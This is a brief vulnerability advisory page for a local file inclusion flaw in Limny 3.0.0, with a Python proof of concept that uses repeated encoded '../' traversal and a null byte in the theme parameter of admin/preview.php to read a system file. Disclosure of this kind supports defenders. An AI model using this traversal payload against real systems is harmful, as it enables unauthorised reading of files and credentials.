Home
Consulting
Advisories
Software
Articles
Contact

Limny 3.0.0 Local File Inclusion

Legacy Advisories

Description

A local file inclusion vulnerability in Limny 3.0.0 can be exploited to include arbitrary files.

Proof Of Concept

import httplib, urllib
 
host = 'localhost'
path = '/limny-3.0.0'
 
c = httplib.HTTPConnection(host)
c.request('GET', path + '/admin/preview.php?theme=' + '..%2F' * 32 + 'windows/win.ini%00')
r = c.getresponse()
 
print r.status, r.reason
print r.read()


Copyright © 2018 AutoSec Tools LLC